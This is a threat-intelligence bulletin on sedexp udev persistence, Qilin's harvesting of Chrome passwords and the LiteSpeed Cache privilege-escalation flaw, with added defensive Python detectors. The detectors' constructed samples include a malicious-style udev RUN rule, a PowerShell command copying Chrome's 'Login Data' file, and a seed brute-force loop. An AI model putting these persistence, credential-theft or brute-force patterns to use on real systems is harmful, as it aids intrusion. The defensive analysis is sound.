
Ankura CTIX FLASH Update - August 27, 2024

Ransomware/Malware Activity

Linux Malware Uses New Mechanism for Persistence, Evades Detection since 2022

Cybersecurity researchers have discovered a piece of Linux malware that has evaded detection for at least two (2) years through a novel persistence mechanism. The ‘sedexp’ malware has been deployed by an unknown threat actor with a likely financial motive, given that it was used to hide credit card scraping code on a web server. The malware persists on a victim Linux machine by adding a ‘udev’ rule that relaunches it every time the system restarts. udev is the Linux device manager: it maintains the device nodes (such as USB drives or storage drives) in the ‘/dev’ directory and lets administrators define rules that take an action when a device is added, removed, or changed. The sedexp rule executes the malware binary (“asedexpb”) whenever a device is added whose major and minor numbers match those of “/dev/random” (major 1, minor 8). Because “/dev/random” is a core system device that the kernel creates on every boot, that condition is met on every restart, so the malware is run again and persistence is maintained. The malware is capable of launching a remote shell to give the attacker access to the host. In addition, sedexp uses memory manipulation techniques to hide its presence on the system, making it very difficult to locate. CTIX analysts recommend that organizations review the udev rules on their Linux systems (‘/etc/udev/rules.d’, ‘/run/udev/rules.d’, and ‘/usr/lib/udev/rules.d’ or ‘/lib/udev/rules.d’) for unexpected ‘RUN’ entries, particularly rules keyed on device major/minor numbers, to ensure they have not been tampered with. CTIX analysts will continue to report on new and emerging malware and associated campaigns.
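
A small udev-rule audit that looks for the persistence shape described above, added here as an example (it is not the CTIX team's or the researchers' tooling). It parses each rule into key/operator/value tokens and flags any rule that runs a program when a device with /dev/random's major/minor numbers (1, 8) appears. The two rule files built in `demo()` are constructed for the demonstration: the program name "asedexpb" comes from the report, everything else is illustrative.

```python
"""Scan udev rules for sedexp-style persistence (added example, not the
CTIX team's or the researchers' code). Flags rules that execute a program
(RUN) when a device with /dev/random's major/minor numbers (1, 8) is added.
The rule files written by demo() are constructed for this demonstration."""
import re
import tempfile
from pathlib import Path

# Directories udev reads *.rules files from (a file in an earlier directory
# overrides a same-named file in a later one).
UDEV_RULE_DIRS = ("/etc/udev/rules.d", "/run/udev/rules.d",
                  "/usr/lib/udev/rules.d", "/lib/udev/rules.d")

# On Linux /dev/random is character device major 1, minor 8.
DEV_RANDOM_MAJOR_MINOR = ("1", "8")

# One udev token: KEY[{attr}] op "value". Quoted values may contain commas.
TOKEN_RE = re.compile(
    r'\s*([A-Za-z_]+)(?:\{([^}]*)\})?\s*(==|!=|\+=|-=|:=|=)\s*"((?:[^"\\]|\\.)*)"\s*,?')


def parse_rule(line):
    """Split one udev rule into (key, attr, op, value) tuples; comment/blank -> []."""
    line = line.strip()
    if not line or line.startswith("#"):
        return []
    tokens, pos = [], 0
    while pos < len(line):
        m = TOKEN_RE.match(line, pos)
        if m is None:
            raise ValueError(f"unparsable udev rule at column {pos}: {line!r}")
        tokens.append((m.group(1), m.group(2), m.group(3), m.group(4)))
        pos = m.end()
    return tokens


def rule_findings(tokens):
    """Reasons a parsed rule looks like sedexp-style persistence ([] if none)."""
    programs = [v for k, a, op, v in tokens
                if k == "RUN" and a != "builtin" and op in ("+=", "=", ":=")]
    if not programs:
        return []
    matches = {(k, a): v for k, a, op, v in tokens if op == "=="}
    major = matches.get(("ENV", "MAJOR"))
    minor = matches.get(("ENV", "MINOR"))
    reasons = []
    if (major, minor) == DEV_RANDOM_MAJOR_MINOR:
        reasons.append("RUN keyed on /dev/random (major 1, minor 8): fires on every boot")
    elif major is not None or minor is not None:
        reasons.append("RUN keyed on raw device major/minor numbers")
    for prog in programs:
        exe = (prog.split() or [""])[0]
        if not exe.startswith("/"):
            # udev resolves bare names inside its own helper directory; a custom
            # rule naming a program this way deserves a look.
            reasons.append(f"RUN program {exe!r} is not an absolute path")
    return reasons


def read_rules(path):
    """Yield (lineno, logical line), joining backslash continuations."""
    buf, start = [], 0
    for n, raw in enumerate(path.read_text(errors="replace").splitlines(), 1):
        if not buf:
            start = n
        if raw.rstrip().endswith("\\"):
            buf.append(raw.rstrip()[:-1])
            continue
        buf.append(raw)
        yield start, " ".join(buf)
        buf = []
    if buf:
        yield start, " ".join(buf)


def audit_dirs(dirs):
    """Return [(path, lineno, line, reasons)] for every suspicious rule found."""
    findings = []
    for d in dirs:
        if not Path(d).is_dir():
            continue
        for path in sorted(Path(d).glob("*.rules")):
            for lineno, line in read_rules(path):
                try:
                    reasons = rule_findings(parse_rule(line))
                except ValueError as exc:
                    reasons = [f"unparsable rule (tampering or nonstandard syntax): {exc}"]
                if reasons:
                    findings.append((str(path), lineno, line, reasons))
    return findings


def demo():
    """Audit two constructed rule files (one benign, one sedexp-shaped)."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "10-benign.rules").write_text(
            '# constructed vendor rule: give plugdev access to USB devices\n'
            'SUBSYSTEM=="usb", MODE="0664", GROUP="plugdev"\n'
            'KERNEL=="sd*", ENV{ID_FS_TYPE}=="ext4", \\\n'
            '    SYMLINK+="disk/by-demo/%k"\n')
        Path(tmp, "99-persist.rules").write_text(
            '# constructed rule shaped like the sedexp persistence rule\n'
            'ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="asedexpb run:+"\n')
        return audit_dirs([tmp])


if __name__ == "__main__":
    for where, n, line, reasons in demo() + audit_dirs(UDEV_RULE_DIRS):
        print(f"{where}:{n}: {line}")
        for r in reasons:
            print(f"    - {r}")
```

Run as a script it first reports the constructed sample and then walks the real udev directories on the host; an "unparsable" finding is worth inspecting too, since a hand-edited rule file is exactly what a tampered system looks like.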

Threat Actor Activity

Qilin Ransomware Group Stealing Chrome-stored Credentials During Ransomware Attacks

The Qilin ransomware group has recently adopted a new tactic: deploying a custom stealer to harvest account credentials stored in the Google Chrome browser. This was observed in a ransomware attack in which Qilin first gained access to a network via compromised credentials for a VPN portal that lacked multi-factor authentication (MFA). After eighteen (18) days of dormancy, likely spent on reconnaissance and mapping the network, the attackers moved laterally to a domain controller. There they modified Group Policy Objects (GPOs) so that a PowerShell script designed to collect credentials stored in Chrome ran every time a user logged into their machine. Because Chrome protects saved passwords with a key tied to the Windows user profile, a script running in the user's own logon session can decrypt them without any additional privilege. The stolen credentials were saved to a shared location and then exfiltrated to Qilin’s command-and-control (C2) server. The attackers then wiped the local copies and the event logs to conceal their activity before deploying their ransomware payload to encrypt data across the compromised machines. Qilin’s pairing of credential harvesting with ransomware deployment means a single incident can expose credentials for many other platforms and services, which significantly complicates the response: every credential saved in a browser on an affected endpoint has to be treated as compromised and rotated. Stolen credentials can also give the attackers, or anyone they sell them to, a foothold for follow-on attacks or valuable information about high-value targets. CTIX analysts recommend that organizations enforce strict policies against storing sensitive credentials in web browsers (for Chrome, the PasswordManagerEnabled policy disables the built-in password manager centrally) and implement multi-factor authentication (MFA), particularly on VPN portals.
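
The chain described above leaves a recognizable trail in Windows event logs. The following is an added example of correlating that trail (it is not Sophos's or the CTIX team's detection content): a script interpreter launched from the domain SYSVOL share (how GPO logon scripts run), a PowerShell script block touching Chrome's "Login Data" password database, and a later clearing of the Security log on the same host. The event IDs are the real Windows ones (4688 process creation, 4104 PowerShell script block logging, 1102 audit log cleared); the event records, host names, paths and script name are constructed for the demonstration.

```python
"""Correlate Windows events into the Qilin-style chain: GPO logon script ->
Chrome saved-password harvest -> Security log cleared. Added example, not
vendor detection content; the SAMPLE_EVENTS records are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Chrome stores saved credentials in the "Login Data" SQLite database under
# the user's profile; a script touching it is reading stored passwords.
CHROME_LOGIN_DB = "login data"

SAMPLE_EVENTS = [  # constructed; field names follow the Windows event schema
    {"time": "2024-08-20T08:01:10", "id": 4688, "host": "WS01",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ep bypass -f "
                    r"\\corp.example\SYSVOL\corp.example\Policies\{GPO-GUID}\User\Scripts\Logon\logon.ps1"},
    {"time": "2024-08-20T08:01:12", "id": 4104, "host": "WS01",
     "ScriptBlockText": r'Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" '
                        r'\\dc01\share$\WS01.db'},
    {"time": "2024-08-20T19:45:00", "id": 1102, "host": "WS01", "Channel": "Security"},
    # benign admin PowerShell on another host: must not match
    {"time": "2024-08-20T09:00:00", "id": 4688, "host": "WS02",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Service"},
    # a log clear with no preceding harvest stage: notable, but not this chain
    {"time": "2024-08-21T03:00:00", "id": 1102, "host": "DC01", "Channel": "Security"},
]

INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe")


def launched_from_sysvol(ev):
    """4688: a script interpreter started with a script that lives in SYSVOL."""
    return (ev["id"] == 4688
            and ev.get("NewProcessName", "").lower().endswith(INTERPRETERS)
            and "\\sysvol\\" in ev.get("CommandLine", "").lower())


def reads_chrome_passwords(ev):
    """4104: script block text references Chrome's saved-password database."""
    text = ev.get("ScriptBlockText", "").lower()
    return ev["id"] == 4104 and "chrome" in text and CHROME_LOGIN_DB in text


def clears_security_log(ev):
    """1102: the audit log was cleared."""
    return ev["id"] == 1102


STAGES = (("gpo_script", launched_from_sysvol),
          ("chrome_harvest", reads_chrome_passwords),
          ("log_cleared", clears_security_log))


def correlate(events, window=timedelta(hours=24)):
    """Per host: the stages seen (in time order) and a severity.

    A log clear only joins the chain if it occurs within `window` of the first
    harvest stage on that host; a clear with no harvest is reported as low."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_host[ev["host"]].append(ev)
    verdicts = {}
    for host, evs in by_host.items():
        stages, harvest_at = [], None
        for ev in evs:
            t = datetime.fromisoformat(ev["time"])
            for name, matches in STAGES:
                if name in stages or not matches(ev):
                    continue
                if name == "log_cleared" and harvest_at is not None and t - harvest_at > window:
                    continue  # too long after the harvest to be its cleanup
                stages.append(name)
                if name != "log_cleared" and harvest_at is None:
                    harvest_at = t
        if "chrome_harvest" in stages:
            severity = "high"      # credentials were read, whether or not logs were wiped
        elif "gpo_script" in stages:
            severity = "medium"    # GPO-delivered script, content not confirmed
        elif stages:
            severity = "low"       # log clear on its own
        else:
            continue
        verdicts[host] = {"stages": stages, "severity": severity}
    return verdicts


if __name__ == "__main__":
    for host, verdict in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {verdict['severity']:6} {' -> '.join(verdict['stages'])}")
```

Both 4688 command lines and 4104 script blocks require audit policy to be enabled (process creation with command-line logging, and PowerShell script block logging); without them the first two stages are invisible and only the 1102 remains, which is exactly the gap the attackers exploited by wiping logs.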

Vulnerabilities

Critical Vulnerability in LiteSpeed Cache Plugin for WordPress Under Active Exploitation

A critical vulnerability in LiteSpeed Cache, a WordPress plugin installed on over 5 million websites, has been discovered and is already under active exploitation. The flaw, tracked as CVE-2024-28000, affects all versions up to and including 6.3.0.1 and allows unauthenticated attackers to escalate their privileges to administrator by brute-forcing a weak security hash, enabling them to create rogue administrator accounts and take over affected sites. The vulnerability was identified on August 19th, 2024, by the Wordfence Threat Intelligence team, who quickly deployed a firewall rule to protect Premium users; free users will receive the protection on September 19th, 2024. Despite the availability of a patched version (6.4.1), only about 30% of sites have updated, leaving millions still vulnerable. Exploitation can lead to severe consequences, including the installation of malicious plugins, alteration of critical settings, and theft of user data. Wordfence has already detected and blocked over 48,500 attacks targeting this vulnerability within twenty-four (24) hours of the details becoming public. This is the second major security issue for LiteSpeed Cache in 2024, underscoring the urgent need for users to update their sites or remove the plugin to prevent takeovers. CTIX analysts strongly urge site administrators affected by this vulnerability to upgrade to the latest patched version, or to remove the plugin temporarily until they can; a web application firewall rule reduces exposure but is not a substitute for the patch.
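
The reason a "weak hash" is brute-forceable is not the length of the hash string but the size of the space it is drawn from. The block below is an added model of that failure, not LiteSpeed Cache's code: a server mints a 6-character alphanumeric token from a PRNG seeded with a value in a small range and accepts it as proof of role, and an attacker who never sees the token simply enumerates the seeds against the check. The seed range (one million), the token length and the alphabet are assumptions for the model, not figures from the page; the hardened variant beside it uses a CSPRNG token whose space cannot be enumerated.

```python
"""Brute force of a token drawn from a small seed space (added illustration,
not LiteSpeed Cache's code). SEED_SPACE, TOKEN_LEN and ALPHABET are
assumptions for the model."""
import hmac
import math
import random
import secrets
import string

ALPHABET = string.ascii_letters + string.digits   # 62 symbols
TOKEN_LEN = 6
SEED_SPACE = 1_000_000   # assumption: the generator can only be seeded a million ways


def weak_token(seed, length=TOKEN_LEN):
    """Deterministic token from a PRNG seed: same seed, same token."""
    rng = random.Random(seed)
    return "".join(rng.choice(ALPHABET) for _ in range(length))


class WeakHashCheck:
    """Server side: accepts the token minted from its secret (but small) seed."""

    def __init__(self, seed_space=SEED_SPACE, seed=None):
        self._seed = secrets.randbelow(seed_space) if seed is None else seed
        self._token = weak_token(self._seed)
        self.attempts = 0

    def verify(self, candidate):
        self.attempts += 1
        return hmac.compare_digest(candidate, self._token)


class StrongHashCheck:
    """Hardened variant: a 256-bit CSPRNG token, no seed to enumerate."""

    def __init__(self, nbytes=32):
        self._token = secrets.token_urlsafe(nbytes)
        self.attempts = 0

    def verify(self, candidate):
        self.attempts += 1
        return hmac.compare_digest(candidate, self._token)


def brute_force(verify, seed_space):
    """Attacker side: derive the token for every seed and submit it.

    Returns (seed, token) for the first accepted token (a colliding seed is
    as good as the real one, the server cannot tell), or None."""
    for seed in range(seed_space):
        token = weak_token(seed)
        if verify(token):
            return seed, token
    return None


def keyspace_bits(length=TOKEN_LEN, alphabet=ALPHABET):
    """Nominal entropy of the token format if every string were equally likely."""
    return length * math.log2(len(alphabet))


def demo(seed_space=SEED_SPACE):
    """Attack a weak check and report nominal vs. effective token strength."""
    target = WeakHashCheck(seed_space)
    hit = brute_force(target.verify, seed_space)
    return {
        "found": hit is not None,
        "attempts": target.attempts,
        "nominal_bits": round(keyspace_bits(), 1),          # 62**6 -> ~35.7 bits
        "effective_bits": round(math.log2(seed_space), 1),  # 1e6  -> ~19.9 bits
    }


if __name__ == "__main__":
    # A smaller seed space keeps the stand-alone run short; the ratio is the point.
    print(demo(100_000))
```

Against the weak check the attacker's cost is bounded by the seed space, which at a million guesses is minutes of HTTP requests; the same loop against the hardened check has nothing to enumerate, which is why the fix is a properly random secret rather than a longer-looking hash.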

The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence about current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high-level intelligence about recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to the CTIX Team (ctix@ankura.com) if additional context is needed.

© Copyright 2024. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.

Tags

report, cybersecurity & data privacy, data & technology, cyber response, data privacy & cyber risk
